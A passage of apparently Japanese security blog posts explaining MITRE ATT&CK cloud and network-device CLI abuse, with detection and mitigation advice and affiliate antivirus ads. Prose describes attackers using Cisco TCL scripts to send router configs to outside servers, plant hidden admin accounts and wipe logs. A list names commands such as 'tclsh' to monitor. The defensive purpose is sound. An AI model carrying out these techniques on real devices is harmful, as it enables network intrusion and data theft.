長期的なアクセスキーの使用を避け、一時的な認証情報（STS）を使用します。アクセスキーは定期的にローテーションし、不要なキーは即座に無効化してください。JPCERT/CCも、クラウド認証情報の管理について継続的に注意喚起を行っています。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
クラウド環境の保護と併せて、管理端末のエンドポイントセキュリティも重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：クラウド管理コマンドの悪用を防ぐために

• T1059.009はAWS CLI・Azure CLI・GCloud CLIなど正規のクラウド管理ツールを悪用する攻撃手法であり、正規操作との区別が困難なため検知難易度が高い
• CloudShellの悪用やIAMロールとの組み合わせにより、権限昇格・ラテラルムーブメント・データ窃取に発展する
• CloudTrail・Azure Monitor・GCP Audit Logsでの監査ログ監視と、通常パターンからの逸脱検知が最も有効な対策
• 最小権限のIAMポリシー設計、条件付きアクセスポリシー、CloudShellの利用制限を組み合わせた多層防御が不可欠
• 認証情報（アクセスキー）の管理強化と定期ローテーションを徹底し、攻撃の起点となる認証情報漏洩リスクを低減する

クラウド環境のセキュリティは、従来のオンプレミスとは異なるアプローチが必要です。正規ツールが攻撃に使われるからこそ、ログの監視と権限管理が最大の防御線となります。自社のクラウド環境のIAM設定を今すぐ見直してみてください。

本記事はMITRE ATT&CK® v16に基づいています。© The MITRE Corporation. Licensed under Apache License 2.0.
※本サイトはMITRE非公式の解説サイトです

参考資料： MITRE ATT&CK T1059.009 – Cloud Administration Command / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC / 内閣サイバーセキュリティセンター（NISC）

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイトをご参照ください。

The post T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツールです。しかし近年、攻撃者がCisco IOS、JunOS、NX-OSなどのネットワーク機器CLIを悪用し、組織のネットワークインフラを侵害する事例が増加しています。MITRE ATT&CKフレームワークではこの手法をT1059.008「Network Device CLI」として分類しています。本記事では、ネットワーク機器CLIを悪用した攻撃の仕組み、実際の攻撃グループによる事例、検知方法、そして効果的な防御策まで、セキュリティ担当者が知るべきポイントを網羅的に解説します。

T1059.008 Network Device CLIとは

MITRE ATT&CKにおけるT1059.008は、攻撃者がネットワーク機器に備わるCLI（コマンドラインインターフェース）を悪用して不正な操作を行う攻撃手法です。T1059「Command and Scripting Interpreter」のサブテクニックとして位置づけられています。

ネットワーク機器には、ルーター、スイッチ、ファイアウォールなどが含まれ、それぞれ独自のCLI環境を持っています。代表的なものにCisco IOSのCLI、Juniper JunOS CLI、Arista EOS CLIなどがあります。攻撃者はこれらのCLIにアクセスすることで、ネットワーク設定の変更、トラフィックの傍受、バックドアの設置、さらにはファームウェアの改ざんまで行うことが可能です。

この攻撃手法が特に危険なのは、ネットワーク機器がセキュリティ監視の盲点になりやすい点にあります。多くの組織ではエンドポイントやサーバーの監視に注力する一方、ネットワーク機器のセキュリティ監視は手薄になりがちです。

攻撃者がネットワーク機器CLIを狙う理由

ネットワークの中枢を掌握できる

ルーターやスイッチはネットワークトラフィックの中継点です。これらの機器を制御することで、攻撃者は通過するすべてのトラフィックを傍受・改ざんする能力を得ます。ACL（アクセス制御リスト）の変更によるファイアウォールルールの無効化、ルーティングテーブルの書き換えによるトラフィックのリダイレクト、GREトンネルやVPN設定を利用したデータの外部送信など、ネットワークレベルでの攻撃が可能になります。

セキュリティ製品の監視対象外

EDR（Endpoint Detection and Response）やアンチウイルスソフトはネットワーク機器上では動作しません。従来のセキュリティ対策ではネットワーク機器内部の不正な操作を検知することが困難です。攻撃者はこの監視の隙間を利用して、長期間にわたる持続的なアクセスを維持します。

認証情報の取得が容易

多くの組織では、ネットワーク機器にデフォルトの認証情報や脆弱なパスワードが使用されています。また、SSH鍵の管理が不十分であったり、TACACS+やRADIUSなどの認証サーバーとの連携が適切に構成されていないケースも少なくありません。攻撃者は初期アクセスで取得した認証情報を流用して、ネットワーク機器へのアクセスを獲得します。

ネットワーク機器CLI上でのTCLスクリプト悪用

Cisco IOSには、TCL（Tool Command Language）スクリプトを実行する機能が搭載されています。攻撃者はこの機能を悪用して、ネットワーク機器上で自動化された不正操作を実行します。

具体的な悪用例として以下が挙げられます：

• 設定情報の外部送信：TCLスクリプトでルーターの設定ファイル（running-config）を取得し、TFTPやHTTPで外部サーバーに送信
• バックドアアカウントの作成：管理者権限を持つ隠しアカウントをスクリプトで自動作成
• ネットワークスキャン：TCLのソケット機能を利用して、内部ネットワークのスキャンを実行
• Syslog操作：ログの改ざんや削除により、攻撃の痕跡を消去

TCLスクリプトの悪用は、「tclsh」コマンドでインタラクティブモードに入ることで実行されます。Cisco IOSのバージョンによっては、権限レベル15（特権EXECモード）でなくても一部のTCL機能にアクセスできる場合があるため、権限管理の徹底が重要です。

実際の攻撃グループによる事例

SYNful Knock（2015年）

2015年にFireEye（現Mandiant）が発見した「SYNful Knock」は、Cisco IOSルーターのファームウェアを改ざんするインプラント攻撃です。攻撃者はルーターのCLIアクセスを得た後、正規のIOSイメージを改ざんされたものに置き換えました。この改ざんされたファームウェアは再起動後も残存し、攻撃者に持続的なバックドアアクセスを提供しました。最大14カ国で被害が確認され、ネットワーク機器を標的とした攻撃の深刻さを世界に示しました。

APT33 / Elfin

イラン系の攻撃グループAPT33（別名Elfin）は、中東やエネルギー分野の組織を標的にした攻撃キャンペーンにおいて、ネットワーク機器の脆弱性を積極的に悪用することが知られています。標的組織のネットワーク機器にアクセスし、ネットワーク設定を変更することでデータ傍受や横展開を行います。

Turla

ロシア系のAPTグループTurlaは、ネットワークインフラストラクチャを標的とした高度な攻撃で知られています。ネットワーク機器を踏み台として利用し、標的組織の内部ネットワークへの持続的なアクセスを維持する手法を用いています。特にISP（インターネットサービスプロバイダ）レベルのネットワーク機器を侵害することで、広範囲の通信傍受を可能にしていました。

検知方法

ネットワーク機器CLIの不正使用を検知するためには、複数のアプローチを組み合わせることが重要です。

Syslogによるログ監視

ネットワーク機器のSyslogを外部のSyslogサーバーに転送し、リアルタイムで監視します。特に注目すべきログイベントは以下の通りです：

• 設定変更イベント（%SYS-5-CONFIG_I）
• ログイン試行の失敗（%SEC_LOGIN-5-LOGIN_SUCCESS, %SEC_LOGIN-4-LOGIN_FAILED）
• 特権モードへの昇格（%SYS-5-PRIV_AUTH_PASS）
• ファイル操作イベント（コピー、削除など）

TACACS+によるコマンドアカウンティング

TACACS+サーバーを導入し、コマンドアカウンティングを有効にすることで、ネットワーク機器上で実行されたすべてのコマンドを記録できます。「show running-config」「copy」「tclsh」など、機密性の高いコマンドの実行を監視し、不審なコマンド実行パターンを検知します。

NetFlowによるトラフィック分析

NetFlowデータを分析することで、ネットワーク機器から外部への不審な通信を検知できます。特に、管理用ネットワーク以外からのSSH/Telnet接続や、機器から外部へのTFTP/HTTP通信は要注意です。

SNMPトラップとファームウェア整合性検証

SNMP（Simple Network Management Protocol）トラップを設定し、設定変更やインターフェース状態の変化をリアルタイムで通知します。また、定期的にファームウェアのハッシュ値を検証し、不正な改ざんがないか確認することも重要です。Ciscoの場合は「verify /md5」コマンドでIOSイメージの整合性を確認できます。

緩和策・防御方法

AAA（認証・認可・アカウンティング）の徹底

ネットワーク機器へのアクセスには、TACACS+またはRADIUSを用いた集中管理型の認証基盤を導入します。ローカルアカウントの使用を最小限にし、多要素認証（MFA）の導入も検討してください。ロールベースアクセス制御（RBAC）により、各管理者に必要最小限の権限のみを付与します。

ファームウェア整合性の確保

ネットワーク機器のファームウェアは、メーカー公式サイトから取得したものを使用し、インストール前にハッシュ値を検証します。Cisco Secure Boot、Juniper Secure Bootなどのセキュアブート機能を有効にし、不正なファームウェアの読み込みを防止します。定期的なファームウェアアップデートにより既知の脆弱性を解消することも重要です。

ネットワークセグメンテーション

管理用ネットワーク（Out-of-Band Management）を分離し、ネットワーク機器への管理アクセスは専用の管理セグメントからのみ許可します。VTY回線にACLを適用し、許可されたIPアドレスからのみSSH接続を受け付けるようにします。Telnetの使用は完全に廃止し、SSHのみに統一してください。

構成管理とバージョン管理

RANCID、Oxidized、Ansible Networkなどの構成管理ツールを導入し、ネットワーク機器の設定をバージョン管理します。定期的に設定のバックアップを取得し、承認されていない変更が行われた場合にアラートを発報する仕組みを構築しましょう。構成のドリフト（意図しない変更）を自動検出する体制が理想的です。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
ネットワーク機器への攻撃と併せて、エンドポイントの防御も重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

MITRE ATT&CK T1059.008「Network Device CLI」は、ネットワーク機器のCLIを悪用した攻撃手法です。本記事のポイントを整理します。

• ネットワーク機器は監視の盲点になりやすい：EDRやアンチウイルスが動作しないため、攻撃者にとって魅力的な標的です
• TCLスクリプトなどの正規機能が悪用される：正規のCLI機能を利用するため、通常のマルウェア検知では発見できません
• APT33やTurlaなどの国家支援型グループが活用：高度な攻撃グループがネットワーク機器を標的としています
• 検知にはSyslog・TACACS+・NetFlowの組み合わせが有効：単一の検知手段では不十分であり、多層的な監視が必要です
• AAA・ファームウェア整合性・セグメンテーションで防御：基本的なセキュリティ対策の徹底が最も効果的な防御策です

ネットワーク機器のセキュリティは、組織のネットワーク全体の安全性を左右します。本記事の内容を参考に、自組織のネットワーク機器のセキュリティ体制を見直してみてください。

参考リンク

• MITRE ATT&CK T1059.008 – Network Device CLI
• IPA 独立行政法人 情報処理推進機構 セキュリティセンター
• JPCERT/CC（一般社団法人JPCERTコーディネーションセンター）
• Cisco IOS Software Integrity Assurance
• 内閣サイバーセキュリティセンター（NISC）

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.

※本サイトはMITRE非公式の解説サイトです

The post T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.